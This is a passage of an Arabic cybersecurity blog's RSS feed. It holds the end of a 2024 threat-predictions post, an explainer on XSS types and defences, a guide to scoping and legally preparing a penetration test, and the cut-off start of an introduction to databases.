&lt;p&gt;تؤكد مبادئ &lt;a href=&quot;https://ar.wikipedia.org/wiki/%D9%86%D9%85%D9%88%D8%B0%D8%AC_%D8%A3%D9%85%D8%A7%D9%86_%D8%A7%D9%84%D8%AB%D9%82%D8%A9_%D8%A7%D9%84%D8%B5%D9%81%D8%B1%D9%8A%D8%A9&quot;&gt;Zero Trust&lt;/a&gt; على التحقق من كل مستخدم وجهاز بغض النظر عن الموقع وهي جزء لا يتجزأ من استراتيجيات الأمن السيبراني الحديثة ومن المتوقع أن يتوسع اعتماد هذا النموذج الأمني بشكل أكبر في عام 2024 حيث تدرك المؤسسات الحاجة إلى تعزيز مستوى الحماية في الشبكات وحماية البيانات الحساسة مع الانتشار المتزايد لثقافة العمل عن بعد.&lt;/p&gt;
&lt;h3 id=&quot;9--قوانين-أكثر-صرامة-بخصوصية-البيانات&quot;&gt;9- قوانين أكثر صرامة بخصوصية البيانات&lt;/h3&gt;
&lt;p&gt;ستواصل الحكومات في جميع أنحاء العالم تطبيق قوانين صارمة تتعلق بخصوصية البيانات في عام 2024، مما يضع مسؤولية أكبر على عاتق المؤسسات لتأمين وحماية بيانات العملاء والمستخدمين، يمكن أن يؤدي عدم الامتثال لهذه القوانين إلى غرامات بمالية كبيرة وإلحاق الضرر بالسمعة للشركات والمؤسسات ولهذا السبب يجب على الشركات الاستثمار في آليات قوية لحماية البيانات بما في ذلك التشفير وضوابط التحكم الوصول والممارسات الأخرى التي تراعي الخصوصية والقوانين المطبقة.&lt;/p&gt;
&lt;h3 id=&quot;10--هجمات-إضافية-على-سلسلة-التوريد&quot;&gt;10- هجمات إضافية على سلسلة التوريد&lt;/h3&gt;
&lt;p&gt;ستستمر &lt;a href=&quot;https://www.aljazeera.net/tech/2021/6/17/%D9%85%D8%A7-%D9%87%D9%88-%D9%87%D8%AC%D9%88%D9%85-%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A7%D9%84%D8%AA%D9%88%D8%B1%D9%8A%D8%AF&quot;&gt;هجمات سلسلة التوريد Supply Chain Attacks&lt;/a&gt;، مع تركيز المهاجمين على استهداف مصنعي البرامج والأجهزة للوصول إلى الأهداف النهائية ويمكن أن يكون لهذه الهجمات دوافع جيوسياسية وعواقب كبيرة وبعيدة المدى ولهذا السبب يجب على الشركات اعتماد إجراءات أمنية صارمة لسلاسل التوريد، وإجراء تقييمات أمنية شاملة للبائعين واعتماد نهج استباقي لاكتشاف التهديدات المحتملة والتخفيف من آثارها.&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;سيكون عام 2024 هو عام محوري للأمن السيبراني ولهذا السبب فإن البقاء على اطلاع دائم بالتهديدات الأمنية والاستفادة من أحدث تقنيات الحماية يعتبر أمر بالغ الأهمية، دعونا نعمل بشكل جماعي نحو مستقبل رقمي أكثر أماناً من خلال التغلب على هذه التحديات والاستفادة من أي فرص تسمح لنا بتحسين وضعنا الأمني الرقمي.&lt;/p&gt;
&lt;p&gt;نتمنى لكم في &lt;a href=&quot;https://cyberpedia.site/&quot;&gt;موسوعة الأمن السيبراني&lt;/a&gt; عاماً جديداً ملؤه الخير والأمان في حياتكم بالعالم الحقيقي وبالعالم الرقمي.&lt;/p&gt;
</content:encoded><category>الأمن السيبراني</category><category>الأمن السيبراني</category><category>توقعات 2024</category><category>هجمات الفدية</category><category>الذكاء الاصطناعي</category><category>الثقة الصفرية</category></item><item><title>ما هي ثغرة XSS؟</title><link>https://blog.cyberpedia.site/what-is-xss/</link><guid isPermaLink="true">https://blog.cyberpedia.site/what-is-xss/</guid><description>شرح ثغرة XSS (Cross-Site Scripting) وأنواعها الثلاثة Reflected وStored وDOM-based، ومخاطرها مثل سرقة الجلسة والتصيد، وطرق الحماية للمستخدم والمطور.</description><pubDate>Wed, 13 Sep 2023 11:29:52 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;ثغرة XSS (Cross-Site Scripting) تنتج عن عدم فلترة مُدخلات المستخدم، فتتيح للمهاجم حقن سكربتات جافاسكربت تُنفَّذ في متصفح زوار الموقع الذين يثقون به. أنواعها Reflected وStored وDOM-based، ويُحمى منها بفلترة جميع حقول الإدخال وتفعيل علمي httponly وsecure على الكوكيز.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;في عصر الإنترنت، أصبح من الممكن الوصول إلى المعلومات والتطبيقات من أي مكان في العالم. ومع ذلك، فإن هذا الانتشار الكبير للويب جعل المستخدمين عرضة لخطر الهجمات الإلكترونية ومن أخطر هذه الهجمات هجمات حقن البرامج النصية عبر مواقع الويب (XSS) والتي يمكن أن تكون لها عواقب وخيمة، في هذا المقال سنتعرف على ثغرة XSS وطرق الحماية الخاصة بها&lt;/p&gt;
&lt;h2 id=&quot;ما-هي-ثغرة-xss-&quot;&gt;ما هي ثغرة XSS ؟&lt;/h2&gt;
&lt;p&gt;&lt;img alt=&quot;مخطط آلية هجوم XSS: حقن المهاجم سكربت خبيث في الموقع ثم تنفيذه في متصفح الزائر وصولاً إلى سرقة بيانات الجلسة&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.BpdiAzNx_1A5M55.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ثغرة XSS، أو Cross-Site Scripting، هي واحدة من أشهر الهجمات السامة على الويب.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;تتمثل هذه الثغرة في إدخال سكريبتات خبيثة إلى موقع الويب، مما يتيح للمهاجم تنفيذ أوامر خبيثة على أجهزة الزوار الذين يتفاعلون مع الموقع المصاب.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;بمعنى آخر، يتم استغلال موقع الويب المصاب كوسيلة لاختراق وإيذاء الزوار الذين يثقون فيه.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;في هجمات XSS، لا يكون المهاجم يستهدف الموقع المصاب بشكل مباشر، ولكن يستغله للوصول إلى الزوار الذين يثقون في الموقع. يقوم المهاجم بزرع سكريبتات خبيثة في الموقع المصاب، وعندما يتفاعل الزائر مع الموقع، يتم تنفيذ هذه السكريبتات في متصفحهم، مما يعرضهم للخطر.&lt;/p&gt;
&lt;p&gt;باختصار، ثغرة XSS تتيح للمهاجم حقن سكريبتات ضارة في موقع الويب، مما يؤدي إلى تنفيذ هذه السكريبتات في متصفح الزوار، مما يعرضهم لخطر الاختراق والتجسس وسرقة البيانات.&lt;/p&gt;
&lt;h2 id=&quot;ما-هي-ثغرة-xss-وأنواعها&quot;&gt;ما هي ثغرة XSS وأنواعها&lt;/h2&gt;
&lt;h3 id=&quot;reflected-xss&quot;&gt;Reflected XSS&lt;/h3&gt;
&lt;p&gt;من أبسط الأنواع هو ناتج عن عدم فلترة دخل المستخدم لنرى هذا المثال:&lt;/p&gt;
&lt;p&gt;عندما نقوم بالبحث عن شيء ما في موقع فنذهب الى حقل البحث و نكتب  ما نريد البحث عنه وعندما نرى الاسم الذي بحثنا عنه معروض في الموقع هنا نقوم بتجربة حقن اكواد JavaScript وبعدها ننسخ الرابط و نرسله الى الهدف.&lt;/p&gt;
&lt;h3 id=&quot;stored-xss&quot;&gt;Stored XSS&lt;/h3&gt;
&lt;p&gt;مثل النوع السابق ولكن هذا النوع عالي الخطورة و ضرره لا يقتصر على المستخدم فقد يؤثر على كل زوار الموقع وعلى الموقع أيضاً لأنه يخزن داخل الموقع.&lt;/p&gt;
&lt;p&gt;على سبيل المثال: الحقن في حقل البحث لا يخزن داخل الموقع لكن عند الحقن في حقل التعليقات فالتعليقات تخزن في قاعدة البيانات و تظهر لكل الزوار وهذا الأمر سيوثر على أي شخص يزور الموقع وهنا لسنا بحاجة لإرسال الرابط المحمل بالاكواد يكفي زيارة الموقع فقط من قبل الهدف ليتم تنفيذ الكود ضمن متصفحه.&lt;/p&gt;
&lt;h3 id=&quot;dom-based-xss&quot;&gt;DOM-based XSS&lt;/h3&gt;
&lt;p&gt;هذا النوع يشبه reflected xss الى حد كبير لكنه يحدث بشكل كامل في جهة المستخدم حيث يقوم المخترق بحقن dom داخل الصفحة مثال يمكن إضافة form مع action  يرسل الى موقع آخر .&lt;/p&gt;
&lt;h2 id=&quot;الاخطار-الناتجة-عن-xss-attack&quot;&gt;الاخطار الناتجة عن XSS attack&lt;/h2&gt;
&lt;h3 id=&quot;سرقة-الجلسة&quot;&gt;سرقة الجلسة&lt;/h3&gt;
&lt;p&gt;يمكن استخدام هذا الهجوم لسرقة cookie الخاص بالجلسة وتسجيل الدخول باسمك و يتم ذلك عن طريق عمل إعادة توجيه الى موقع آخر يكون مجهز من قبل المخترق يستقبل ال cookie  الخاصة بالموقع المصاب.&lt;/p&gt;
&lt;h3 id=&quot;الاحتيال-والتصيد&quot;&gt;الاحتيال والتصيد&lt;/h3&gt;
&lt;p&gt;يمكن استخدام النوع الثالث للقيام بوضع form  و إرسال المعلومات إلى موقع خاص بالمخترق وأنت تظن انها لوحة تسجيل الدخول الخاصة بالموقع الرسمي وعندها لن يحتاج المهاجم لسرقة الجلسة فقد حصل على كلمة السر بشكل مباشر منك&lt;/p&gt;
&lt;h3 id=&quot;تشويه-الموقع&quot;&gt;تشويه الموقع&lt;/h3&gt;
&lt;p&gt;يمكن استخدام أكواد javascript  لتشويه الموقع بالنسبة للمستخدمين.&lt;/p&gt;
&lt;h2 id=&quot;الحماية-من-xss&quot;&gt;الحماية من XSS&lt;/h2&gt;
&lt;p&gt;في هذا القسم من المقال سوف نقدم لك (المستخدم العادي) بعض النصائح لتجنب الوقوع في مثل هذا الهجوم بالإضافة لبعض النصائح الخاصة لمطوري المواقع.&lt;/p&gt;
&lt;h3 id=&quot;بالنسبة-للمستخدم&quot;&gt;بالنسبة للمستخدم&lt;/h3&gt;
&lt;p&gt;عدم فتح أي رابط لا تعلم مصدره يمكنك استخدام إضافة &lt;a href=&quot;https://noscript.net/&quot;&gt;noscript&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;أو يمكنك الذهاب الى الاعدادات الخاصة بالمتصفح وتعطيل خيار استخدام javascript .&lt;/p&gt;
&lt;h3 id=&quot;بالنسبة-للمطور&quot;&gt;بالنسبة للمطور&lt;/h3&gt;
&lt;p&gt;كمطور ويب تقع عليك مسؤولية حماية المستخدم من المخاطر وليس فقط حماية الموقع&lt;/p&gt;
&lt;p&gt;1- يجب التأكد من تطبيق فلاتر مناسبة على جميع حقول الإدخال الخاصة بالموقع&lt;/p&gt;
&lt;p&gt;2- يفضل تفعيل httponly flag و إضافته لعدم السماح بقراء ال cookie  عبر اكواد JavaScript&lt;/p&gt;
&lt;p&gt;3- تفعيل secure flag لكي لا يتم ارسال ال cookie  إلا عن طريق HTTPS&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;لا يوجد نظام آمن بشكل مطلق ولكن يمكننا التخفيف من المخاطر المحتملة ومن المهم جداً نشر التوعية وثقافة &lt;a href=&quot;https://blog.cyberpedia.site/what-is-cyber-security/&quot;&gt;الأمن السيبراني&lt;/a&gt; على جميع المستويات، كما يجب الإشارة إلى أمر مهم آخر وهو: إن كنت مبرمج أو مطور ويب فهذي النصائح لا تكفي ويجب عليك التوسع بشكل أكبر لمعرفة كل التفاصل الخاصة بهذه الثغرة والاجراءات المضادة لها.&lt;/p&gt;
</content:encoded><category>اختبار الاختراق</category><category>XSS</category><category>ثغرات الويب</category><category>أمن تطبيقات الويب</category><category>حقن السكربت</category></item><item><title>الإعداد لعملية اختبار الاختراق</title><link>https://blog.cyberpedia.site/befor-pentration-testing/</link><guid isPermaLink="true">https://blog.cyberpedia.site/befor-pentration-testing/</guid><description>الخطوات التي تسبق اختبار الاختراق: تحديد الهدف ونطاق العمل، وجدول المواعيد، والالتزامات والمسؤوليات، وخطة الطوارئ، والتقنيات المسموح استخدامها.</description><pubDate>Fri, 04 Aug 2023 14:19:55 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;قبل أي اختبار اختراق يجب تحديد هدف العميل ونطاق العمل بحدوده المنطقية والفيزيائية، وإعداد جدول مواعيد لكل مرحلة، والاتفاق على الالتزامات بمساعدة محامٍ وعلى المسؤوليات، ووضع خطة طوارئ مع فريق حماية العميل، وتحديد التقنيات المسموحة والممنوعة. تجاوز أي من هذه الحدود قد يعرّضك لمساءلة قانونية.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;يعد اختبار الاختراق عملية مهمة لتحديد المخاطر و الكشف عن الثغرات لحماية المؤسسة من عمليات الاختراق ولكن قبل القيام بهذه العملية يجب اتباع العديد من الخطوات الاساسية لضمان نجاح العملية و تفادي حدوث أي مشاكل.&lt;/p&gt;
&lt;p&gt;في هذا المقال سوف نشرح هذه الخطوات و المراحل التي يجب أن تتم قبل عملية اختبار الاختراق&lt;/p&gt;
&lt;h2 id=&quot;الهدف-ونطاق-العمل&quot;&gt;الهدف ونطاق العمل&lt;/h2&gt;
&lt;h3 id=&quot;الهدف-goal&quot;&gt;الهدف (Goal)&lt;/h3&gt;
&lt;p&gt;تحديد الهدف من عملية اختبار الاختراق (السبب الرئيسي الذي دفع العميل الى توظيفك للقيام بهذه العملية) معرفة الهدف سوف يساعدك للقيام بهذه المهمة ولهذا السبب يفضل سؤال العميل بشكل مباشر لماذا تريد القيام بعملية اختبار الاختراق؟&lt;/p&gt;
&lt;p&gt;لا تتوقع حصولك على الإجابة الصحيحة بشكل دائم فمن الممكن أن تكون إجابة العميل على الشكل التالي:&lt;/p&gt;
&lt;p&gt;نريد القيام بعملية اختبار الاختراق لأننا بالفعل قد تعرضنا للاختراق، هنا سيختلف عملك وسيكون تركيزك باتجاه التحقيق الجنائي الرقمي&lt;/p&gt;
&lt;p&gt;اما اذا كان جوابه:&lt;/p&gt;
&lt;p&gt;نريد القيام بعملية اختبار الاختراق لاختبار مستوى الحماية، فهنا يجب أن يكون تركيزك على كشف الثغرات و توضيح نقاط الضعف.&lt;/p&gt;
&lt;h3 id=&quot;نطاق-العمل-scope&quot;&gt;نطاق العمل (Scope)&lt;/h3&gt;
&lt;p&gt;وهو الحدود أو المجال المسموح لك القيام بعملية اختبار الاختراق ضمنه و أي تجاوز له قد يعرضك لمسألة قانونية وهو ينقسم الى قسمين:&lt;/p&gt;
&lt;h3 id=&quot;1--الحدود-المنطقية&quot;&gt;1- الحدود المنطقية&lt;/h3&gt;
&lt;p&gt;يجب تحديد الحدود المنطقية مع العميل بشكل دقيق من خلال تحديد الأقسام التي يجب القيام بعملية اختبار الاختراق عليها، مثال: قسم التسويق&lt;/p&gt;
&lt;p&gt;اذا لم يتم تحديد الحدود بشكل دقيق فقد يؤدي ذلك إلى مشاكل مع العميل فقد تظن أنك تعمل داخل المجال المحدد والمسموح به ومع ذلك قد يعتقد العميل أنك قد تجاوزت الحدود أو المجال المتفق عليه ولهذا السبب من المهم التعامل بدقة مع هذه المرحلة و تحديد حدود واضحة تحميك أثناء العمل لعدم الوقوع في أي مشاكل قانونية أو اختلاف في وجهات النظر.&lt;/p&gt;
&lt;h3 id=&quot;2--الحدود-الفيزيائية&quot;&gt;2- الحدود الفيزيائية&lt;/h3&gt;
&lt;p&gt;تعتبر الحدود الفيزيائية عبارة عن أشياء ملموسة مثل &lt;a href=&quot;https://blog.cyberpedia.site/ip/&quot;&gt;عناوين IP&lt;/a&gt; ومن الممكن أن تكون مجالات من العناوين أو أسماء الدومينات (في عملية اختبار اختراق مواقع الويب)&lt;/p&gt;
&lt;p&gt;يفضل ان تسأل العميل بشكل واضح هل الدومينات الفرعية &lt;a href=&quot;https://en.wikipedia.org/wiki/Subdomain&quot;&gt;sub domain&lt;/a&gt; مشمولة ضمن العملية أم لا فمن الممكن أن يحدد بعضها فقط ضمن هذه العملية.&lt;/p&gt;
&lt;h2 id=&quot;جدول-المواعيد&quot;&gt;جدول المواعيد&lt;/h2&gt;
&lt;p&gt;هو عبارة عن جدول يوضع فيه مراحل عملية اختبار الاختراق ويحتوي على مواعيد بداية المرحلة ونهايتها و الهدف منها والعديد من التفاصيل الأخرى&lt;/p&gt;
&lt;p&gt;هذا الجدول يجب تقديمه للعميل ليكون ملم بكل تفاصيل عملية اختبار الاختراق وتكمن أهميته عند حدوث أي مشكلة فيمكن لفريق الحماية الخاص بالعميل معرفة مكان المشكلة و مقدار الخطورة المتعلقة بها.&lt;/p&gt;
&lt;p&gt;اذا كان مستوى خطورة المرحلة عالي جداً فيمكن أن يكون فريق الحماية على استعداد لتنفيذ خطة الطوارئ وفي حال حدوث أي تغير على هذا الجدول فيجب اطلاع العميل على هذه التغيرات بشكل مباشر.&lt;/p&gt;
&lt;p&gt;مثال على جدول المواعيد:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;البداية&lt;/th&gt;
&lt;th&gt;النهاية&lt;/th&gt;
&lt;th&gt;المصدر&lt;/th&gt;
&lt;th&gt;الأهداف&lt;/th&gt;
&lt;th&gt;المرحلة&lt;/th&gt;
&lt;th&gt;مستوى الخطورة&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;11-20-2013 07:00AM PST&lt;/td&gt;
&lt;td&gt;11-20-2013 11:00AM PST&lt;/td&gt;
&lt;td&gt;&lt;code&gt;100.100.100.96&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;200.200.0.0/16&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;الفحص (Scanning)&lt;/td&gt;
&lt;td&gt;متوسط (Medium)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11-21-2013 05:00PM PST&lt;/td&gt;
&lt;td&gt;11-21-2013 08:00PM PST&lt;/td&gt;
&lt;td&gt;&lt;code&gt;100.100.100.96&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;200.200.0.0/22&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;كشف نظام التشغيل (OS detection)&lt;/td&gt;
&lt;td&gt;متوسط (Medium)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11-24-2013 03:00PM PST&lt;/td&gt;
&lt;td&gt;11-24-2013 06:00PM PST&lt;/td&gt;
&lt;td&gt;&lt;code&gt;100.100.100.96&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;www.target.inc&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;الاستغلال (Exploitation)&lt;/td&gt;
&lt;td&gt;عالٍ (High)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&quot;الالتزامات-و-المسؤوليات&quot;&gt;الالتزامات و المسؤوليات&lt;/h2&gt;
&lt;p&gt;عملية اختبار الاختراق تحتوي على العديد من المخاطر لك وللعميل ولهذا السبب هناك العديد من الالتزامات والمسؤوليات التي يجب أن تتحملها&lt;/p&gt;
&lt;h3 id=&quot;الالتزامات-liabilities&quot;&gt;الالتزامات (Liabilities)&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;عدم الخروج عن المجال المحدد&lt;/li&gt;
&lt;li&gt;حوادث حذف البيانات&lt;/li&gt;
&lt;li&gt;حوادث توقف الخدمة&lt;/li&gt;
&lt;li&gt;أي فعل أو نشاط تقوم به وله تأثير سلبي على عمل المؤسسة&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;بالنسبة للالتزامات يجب أن يتم الاتفاق عليها مع العميل بالتعاون مع محامي أو شخص قانوني لتقليل مسؤوليتك عن الحوادث التي قد تقوم بها، هذا الاتفاق يحتاج إلى محامي ليجنبك أي مشاكل قانونية&lt;/p&gt;
&lt;h3 id=&quot;المسؤوليات-responsibilities&quot;&gt;المسؤوليات (Responsibilities)&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;اطلاع العميل على كل التفاصيل خلال العملية&lt;/li&gt;
&lt;li&gt;حفظ التقرير الخاص باختبار الاختراق بشكل آمن&lt;/li&gt;
&lt;li&gt;عدم الإفصاح عن أي معلومة&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;أما بالنسبة للمسؤوليات فهي لا تحتاج لمحامي ولكن تتطلب منك الانتباه للمعلومات التي تستخرجها أو تحصل عليها أثناء عملية اختبار الاختراق، فقد تحتاج إلى تشفير التقرير و تدمير المعلومات بعد الانتهاء من عملية اختبار الاختراق وعدم تسريب معلومات العميل&lt;/p&gt;
&lt;h2 id=&quot;خطة-الطوارئ&quot;&gt;خطة الطوارئ&lt;/h2&gt;
&lt;p&gt;قد تحدث أخطاء اثناء عملية اختبار الاختراق وهنا يأتي دور خطة الطوارئ فهي خطة تضعها أنت و فريق الحماية الخاص بالعميل و تحوي على تفاصيل ومعلومات الاتصال بالشخص المسؤول عن الشبكة أو النظام و الخطوات التي يجب القيام بها لمعالجة المشاكل المحتملة&lt;/p&gt;
&lt;h3 id=&quot;متى-تطبق-خطة-الطوارئ&quot;&gt;متى تطبق خطة الطوارئ؟&lt;/h3&gt;
&lt;p&gt;عند حدوث مشكلة في السيرفر الخاص بالعميل أو عند حدوث حذف أو تعديل على قاعدة البيانات&lt;/p&gt;
&lt;h3 id=&quot;متى-تفشل-خطة-الطوارئ&quot;&gt;متى تفشل خطة الطوارئ؟&lt;/h3&gt;
&lt;p&gt;عندما لا تعرف مع من تتواصل عند حدوث مشكلة واذا لم تكن الجهة المسؤولة عن الخطة متوفرة بشكل دائم&lt;/p&gt;
&lt;h2 id=&quot;التقنيات-المسموح-استخدامها&quot;&gt;التقنيات المسموح استخدامها&lt;/h2&gt;
&lt;p&gt;قبل وضع خطة الطوارئ يجب أن تحدد مع العميل ما هي الأساليب المسموح استخدامها وما هو الممنوع ويفضل تحديد ذلك لكي لا تصدم العميل بطريقة قد لا يكون يريدك أن تستعملها و قد تسبب له ولك مشاكل قانونية&lt;/p&gt;
&lt;p&gt;على سبيل المثال قد يرفض العميل استخدامك &lt;a href=&quot;https://blog.cyberpedia.site/mitm/&quot;&gt;لهجمات التنصت&lt;/a&gt; و هجمات منع الخدمة والهندسة الاجتماعية&lt;/p&gt;
&lt;p&gt;انصحك بمحاولة إقناعه بالسماح لك بتنفيذ هجمات الهندسة الاجتماعية لأن الموظفين (العنصر البشري) هم النقطة الأضعف بأي منظومة وعملية استغلالهم أسهل من استغلال الثغرات&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;عملية اختبار الاختراق هي عملية خطيرة ولذلك يجب أن تأخذ الاحتياطات والخطوات السابقة لتجنب حدوث أي مشاكل قانونية أو أي أخطاء له تأثير سلبي على عمل المؤسسة&lt;/p&gt;
&lt;p&gt;حاولنا التركيز على المحاسبة القانونية والتي تم تكرارها لأكثر من مرة لأنك عند القيام بعملية اختبار اختراق فأنت على بعد خطوة من المحكمة لدفع تعويضات مالية للشركة إذا لم تلتزم بالقواعد الخاصة بهذه العملية&lt;/p&gt;
</content:encoded><category>اختبار الاختراق</category><category>اختبار الاختراق</category><category>نطاق العمل</category><category>خطة الطوارئ</category><category>الجوانب القانونية</category></item><item><title>مدخل إلى قواعد البيانات</title><link>https://blog.cyberpedia.site/database/</link><guid isPermaLink="true">https://blog.cyberpedia.site/database/</guid><description>شرح مبسط لقواعد البيانات وأنظمة DBMS: الجداول والأعمدة والسطور، والمفتاح الأساسي والأجنبي، وأنواع العلاقات، وأوامر SQL بأنواعها DDL وDML وDQL وDCL.</description><pubDate>Mon, 29 May 2023 20:34:57 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;قاعدة البيانات مستودع يجمع معلومات مترابطة بشكل منظم، وتتكون من جداول من أعمدة وسطور ترتبط بعلاقات عبر المفتاح الأساسي primary key والمفتاح الأجنبي foreign key. يُتحكم بها عبر برامج DBMS مثل MySQL وPostgreSQL وOracle، وبلغة SQL التي تنقسم أوامرها إلى DDL وDML وDQL وDCL.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;بدأ ظهور فكرة قاعدة البيانات من حاجة الأفراد و المؤسسات لنظام يخزن البيانات في مكان واحد تكون البيانات قابلة للتعديل و الادخال بسهولة وتكون محمية من التلف ولهذا السبب تم إيجاد قواعد البيانات.&lt;/p&gt;
&lt;p&gt;تستخدم قواعد البيانات في العديد من المجالات فهي تستخدم بالمؤسسات والبنوك حيث تخزن عمليات الإيداع والسحب وفي مواقع التواصل الاجتماعي حيث تخزن معلوماتك وقائمة أصدقائك و منشوراتك&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;قاعدة البيانات (database):&lt;/strong&gt; يمكن تعريف قاعدة البيانات على أنها عبارة عن مستودع أو خزنة تجمع داخلها معلومات مترابطة بشكل منظم&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;يوجد العديد من الميزات لقاعدة البيانات وهي:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;تمثل معلومات واقعية&lt;/li&gt;
&lt;li&gt;تعد منطقية ومتسقة ومنظمة&lt;/li&gt;
&lt;li&gt;سهولة الوصول للمعلومات داخلها&lt;/li&gt;
&lt;li&gt;سهولة المزامنة أي يمكن الوصول للمعلومات من قبل العديد من المستخدمين&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;يمكن التحكم بقاعدة البيانات عن طريق برامج تحكم في قاعدة البيانات (DBMS) Database management system&lt;/p&gt;
&lt;p&gt;وهي مجموعة من البرامج المجمعة التي تتحكم في إنشاء وإدخال المعلومات واسترجاع المعلومات والوصول الى قواعد البيانات&lt;/p&gt;
&lt;p&gt;هناك العديد من هذه البرامج وأشهرها: &lt;a href=&quot;https://www.mysql.com/&quot;&gt;MySQL&lt;/a&gt; و&lt;a href=&quot;https://www.postgresql.org/&quot;&gt;PostgreSQL&lt;/a&gt; و&lt;a href=&quot;https://www.oracle.com/database/&quot;&gt;Oracle&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;الجداول-tables&quot;&gt;الجداول tables&lt;/h2&gt;
&lt;p&gt;تتكون قاعدة البيانات من جداول متعددة مترابطة مع بعضها بواسطة علاقات وكل جدول يمثل كائن معين أو عملية معينة، على سبيل المثال: يمكن أن يوجد جدول للسيارات يوضع فيها نوع السيارة والمسافة التي قطعتها وعام التصنيع ولونها ورقم اللوحة وكل جدول يتكون من أعمدة (columns) وسطور (row) وتقاطع السطر مع العامود يسمى خلية مثال على هذا الجدول:&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;جدول سيارات يوضح السمة في رأس الجدول والسطر الذي يمثل سيارة واحدة والعمود الذي يجمع قيم سمة عام التصنيع&quot; width=&quot;1600&quot; height=&quot;925&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.CREZTVRL_Z6nRD5.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;كما لاحظنا في الجدول فان السمة تمثل صفة في الكائن والسطر يوضح معلومات سيارة من السيارات العامود يمثل معلومات تحت سمة معينة.&lt;/p&gt;
&lt;h2 id=&quot;العلاقات-بين-الجداول&quot;&gt;العلاقات بين الجداول&lt;/h2&gt;
&lt;p&gt;العلاقات هي عنصر أساسي في قواعد البيانات فهي تجعل قواعد البيانات مترابطة وتعطينا قوة في الوصول للمعلومات المتعلقة ببعضها&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;مثال:&lt;/strong&gt; لنفترض أنه لدينا منزل وهو كيان يمثل بجدول فيه معلومات المنزل مثل المساحة عدد الغرف الخ..&lt;/p&gt;
&lt;p&gt;ويوجد للمنزل مالك هو أيضا كيان يمثل بجدول فيه معلوماته كالطول و الاسم والجنس ورقم الهوية ويرتبط المالك مع المنزل بعلاقة أي المالك يملك هذا المنزل وهكذا العلاقات ولكن يأتي سؤال مهم كيف أنشئ العلاقة؟ لكي ننشى العلاقة نحتاج للتعرف الى شى أساسي و هو المفاتيح&lt;/p&gt;
&lt;h2 id=&quot;المفاتيح&quot;&gt;المفاتيح&lt;/h2&gt;
&lt;p&gt;هي عبارة عن عامود نستطيع من خلاله جلب معلومات نموذج معين (row) لناخذ مثال لدينا جدول من طلاب الجامعة نريد جلب طالب اسمه أحمد، اذا بحثنا عنه قد يوجد العديد من الطلاب بنفس الاسم ولذلك نستخدم عامود لايمكن أن يتكرر مثل الرقم الجامعي فهو لا يتكرر و يعطينا المعلومات المطلوبة و هذا النوع من المفاتيح يسمى &lt;a href=&quot;https://www.w3schools.com/sql/sql_primarykey.asp&quot;&gt;primary key&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;وهو مفتاح لا يتكرر ولايجب أن تكون الخلية الخاصة به فارغة وعند أخذ هذا المفتاح و وضعه في جدول آخر من أجل إنشاء علاقة يصبح اسمه &lt;a href=&quot;https://www.w3schools.com/sql/sql_foreignkey.asp&quot;&gt;foreign key&lt;/a&gt; وهذا الأمر سوف يوضح في الجدول التالي.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;جدولا المالكين والمنازل يرتبطان بعمود الرقم الوطني للمالك: مفتاح أساسي في جدول المالكين ومفتاح أجنبي في جدول المنازل&quot; width=&quot;1600&quot; height=&quot;939&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.D4xm0_U__2iOS5q.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;الآن كما نلاحظ في المثال السابق فإن عامود الرقم الوطني مشترك بين الجدولين وعندما نريد معرفة المنزل الخاص بشخص محدد نبحث عن الرقم الوطني في الجدولين عندها يظهر لنا معلومات المالك والمنازل الخاصة به&lt;/p&gt;
&lt;h2 id=&quot;أنواع-العلاقات&quot;&gt;أنواع العلاقات&lt;/h2&gt;
